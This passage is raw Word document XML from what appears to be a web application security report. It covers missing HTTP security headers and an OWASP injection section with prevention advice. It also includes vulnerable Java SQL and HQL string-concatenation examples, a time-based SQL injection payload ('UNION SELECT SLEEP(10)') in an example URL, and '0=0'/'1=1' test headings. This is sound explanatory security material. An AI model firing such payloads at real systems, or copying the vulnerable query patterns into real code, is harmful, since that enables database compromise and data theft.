          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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0F0F0F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It is recommended to implement the below HTTP security headers which are missing: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05BE9DDA" w:rsidP="449E37A7" w:rsidRDefault="05BE9DDA" w14:paraId="07093300" w14:textId="0C78EB5C">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0F0F0F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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0F0F0F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cache-Control: no-store Referrer-Policy: no-referrer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05BE9DDA" w:rsidP="449E37A7" w:rsidRDefault="05BE9DDA" w14:paraId="016DEA06" w14:textId="26E30EB7">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0F0F0F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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0F0F0F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Permissions-Policy: geolocation 'none'; camera 'none'; speaker 'none';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="682AF45C" w14:textId="30AF14B6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off"/>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pPr>
    </w:p>
    <w:p w:rsidR="05BE9DDA" w:rsidP="449E37A7" w:rsidRDefault="05BE9DDA" w14:paraId="1B64DB7B" w14:textId="69D2848D">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pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="05BE9DDA">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t>Cache-Control: no-store:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05BE9DDA" w:rsidP="449E37A7" w:rsidRDefault="05BE9DDA" w14:paraId="72E07A5E" w14:textId="41E22C07">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="05BE9DDA">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t>Issue:</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 xml:space="preserve"> If this header is missing or not set to "no-store," sensitive information may be stored in the user's browser cache. This could lead to unauthorize</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d</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 xml:space="preserve"> access to cached data by malicious actors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05BE9DDA" w:rsidP="449E37A7" w:rsidRDefault="05BE9DDA" w14:paraId="7FA22695" w14:textId="1E756A4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="05BE9DDA">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t>Consequence:</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 xml:space="preserve"> Sensitive data, such as user authentication tokens or </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private information</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 could be retrieved from the browser cache by an attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05BE9DDA" w:rsidP="449E37A7" w:rsidRDefault="05BE9DDA" w14:paraId="7BD6EC5E" w14:textId="2DEAAF58">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pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="05BE9DDA">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t>Referrer-Policy: no-referrer:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05BE9DDA" w:rsidP="449E37A7" w:rsidRDefault="05BE9DDA" w14:paraId="39953006" w14:textId="5E072D6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="05BE9DDA">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t>Issue:</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 xml:space="preserve"> If this header is missing or not set to "no-referrer," the browser may include the full URL of the referring page when making requests to your server. This can potentially leak sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05BE9DDA" w:rsidP="449E37A7" w:rsidRDefault="05BE9DDA" w14:paraId="0515BA88" w14:textId="30B756C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="05BE9DDA">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t>Consequence:</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 xml:space="preserve"> Referrer information might be exposed, allowing attackers to gain insights into the user's browsing behavior and potentially </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identify</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 xml:space="preserve"> sensitive pages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05BE9DDA" w:rsidP="449E37A7" w:rsidRDefault="05BE9DDA" w14:paraId="18760AAA" w14:textId="003070D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>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pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="05BE9DDA">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t>Permissions-Policy: geolocation 'none'; camera 'none'; speaker 'none':</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05BE9DDA" w:rsidP="449E37A7" w:rsidRDefault="05BE9DDA" w14:paraId="31E89C9E" w14:textId="6D82778D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="05BE9DDA">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t>Issue:</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 xml:space="preserve"> If this header is missing or not configured to limit permissions, it may allow potentially malicious content to access sensitive device features such as geolocation, camera, and speaker without the user's explicit consent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05BE9DDA" w:rsidP="449E37A7" w:rsidRDefault="05BE9DDA" w14:paraId="453CFC16" w14:textId="1426F93A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>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pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="05BE9DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Consequence:</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="05BE9DDA">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t xml:space="preserve"> Without proper restrictions, a malicious script or attacker could abuse these permissions, leading to privacy violations or unauthorized access to user devices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="0CB3B2F3" w14:textId="50B91450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="16C4E923" w14:textId="1FFD9D57">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="47373666" w14:textId="640E0F06">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="0089411D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A03:2021 – Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="352AA92D" w14:textId="38E1C583">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="0089411D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="508F268A" w14:textId="10A8330A">
      <w:pPr>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An application is vulnerable to attack when:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="03514528" w14:textId="78929362">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User-supplied data is not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validated</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filtered, or sanitized by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="55D1DEA5" w14:textId="752F3296">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Dynamic queries or non-parameterized calls without context-aware escaping are used directly in the interpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="726843F7" w14:textId="7DE936D8">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Hostile data is used within object-relational mapping (ORM) search parameters to extract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additional</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sensitive records.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="13E49A11" w14:textId="7F1726CD">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Hostile data is directly used or concatenated. The SQL or command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contains</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the structure and malicious data in dynamic queries, commands, or stored procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="7C94541C" w14:textId="76778749">
      <w:pPr>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Some of the more common injections are SQL, NoSQL, OS command, Object Relational Mapping (ORM), LDAP, and Expression Language (EL) or Object Graph Navigation Library (OGNL) injection. The concept is identical among all interpreters. Source code review is the best method of detecting if applications are vulnerable to injections. Automated testing of all parameters, headers, URL, cookies, JSON, SOAP, and XML data inputs is strongly encouraged. Organizations can include static (SAST), dynamic (DAST), and interactive (IAST) application security testing tools into the CI/CD pipeline to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identify</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introduced injection flaws before production deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="3700163F" w14:textId="726C7421">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="0089411D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>How to Prevent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="59A63C02" w14:textId="28F610C4">
      <w:pPr>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Preventing injection requires keeping data separate from commands and queries:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="6267F532" w14:textId="6DB1F3CB">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The preferred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option</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is to use a safe API, which avoids using the interpreter entirely,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provides</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a parameterized interface, or migrates to Object Relational Mapping Tools (ORMs).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="0089411D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note:</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Even when parameterized, stored procedures can still introduce SQL injection if PL/SQL or T-SQL concatenates queries and data or executes hostile data with EXECUTE IMMEDIATE or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exec(</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="5C4D8605" w14:textId="6865163F">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Use positive server-side input validation. This is not a complete defense as many applications require special characters, such as text areas or APIs for mobile applications.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="45317781" w14:textId="1E1C6157">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For any residual dynamic queries, escape special characters using the specific escape syntax for that interpreter.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="0089411D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note:</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SQL structures such as table names, column names, and so on cannot be escaped, and thus user-supplied structure names are dangerous. This is a common issue in report-writing software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="30CD816F" w14:textId="5D4186E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>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Use LIMIT and other SQL controls within queries to prevent mass disclosure of records in case of SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="0D025EB0" w14:textId="0B48319A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="0089411D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example Attack Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="6E603063" w14:textId="2D12310C">
      <w:pPr>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1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scenario #1:</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An application uses untrusted data in the construction of the following vulnerable SQL call:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="5E42E11F" w14:textId="12186A5E">
      <w:pPr>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String query = "SELECT \* FROM accounts WHERE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custID</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request.getParameter</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("id") + "'";</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="32520C9C" w14:textId="3DBC9A72">
      <w:pPr>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1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scenario #2:</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Similarly, an application’s blind trust in frameworks may result in queries that are still vulnerable, (e.g., Hibernate Query Language (HQL)):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="66F4DAB1" w14:textId="7D2C52D0">
      <w:pPr>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Query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HQLQuery</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session.createQuery</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("FROM accounts WHERE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custID</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request.getParameter</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("id") + "'");</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="3368D005" w14:textId="3EC2BAF5">
      <w:pPr>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In both cases, the attacker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modifies</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the ‘id’ parameter value in their browser to send: ' UNION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SLEEP(</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10</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For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="4B72E06B" w14:textId="5A5A1CD3">
      <w:pPr>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hyperlink r:id="R50e8a2db8ed540d5">
        <w:r w:rsidRPr="449E37A7" w:rsidR="0089411D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>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http://example.com/app/accountView?id=</w:t>
        </w:r>
      </w:hyperlink>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UNION SELECT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SLEEP(</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10</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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089411D" w:rsidP="449E37A7" w:rsidRDefault="0089411D" w14:paraId="44B30C6C" w14:textId="6C0FC9E8">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>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pP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This changes the meaning of both queries to return all the records from the accounts table. More dangerous attac</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ks could </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modify</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="0089411D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or delete data or even invoke stored procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2F6F7825" w:rsidP="449E37A7" w:rsidRDefault="2F6F7825" w14:paraId="4AB0CF97" w14:textId="2F3D1517">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="2F6F7825">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2F6F7825" w:rsidP="449E37A7" w:rsidRDefault="2F6F7825" w14:paraId="25B42A07" w14:textId="53D3738A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="2F6F7825">
        <w:drawing>
          <wp:inline wp14:editId="320C8CBE" wp14:anchorId="7A3AE94B">
            <wp:extent cx="4572000" cy="2286000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2022074155" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R7ac2781113b049b3">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2F6F7825" w:rsidP="449E37A7" w:rsidRDefault="2F6F7825" w14:paraId="26167F08" w14:textId="01EDA66C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="2F6F7825">
        <w:drawing>
          <wp:inline wp14:editId="23DC66C5" wp14:anchorId="2E2008A5">
            <wp:extent cx="4572000" cy="2343150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="249676488" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R4e1c6908fba7494f">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2F6F7825" w:rsidP="449E37A7" w:rsidRDefault="2F6F7825" w14:paraId="7F552F24" w14:textId="20F13D52">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="2F6F7825">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2F6F7825" w:rsidP="449E37A7" w:rsidRDefault="2F6F7825" w14:paraId="5089DBE2" w14:textId="4EC83BE5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2F6F7825">
        <w:drawing>
          <wp:inline wp14:editId="28990A18" wp14:anchorId="1A308185">
            <wp:extent cx="4572000" cy="2333625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1679067639" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Read89019ff2c44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33625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
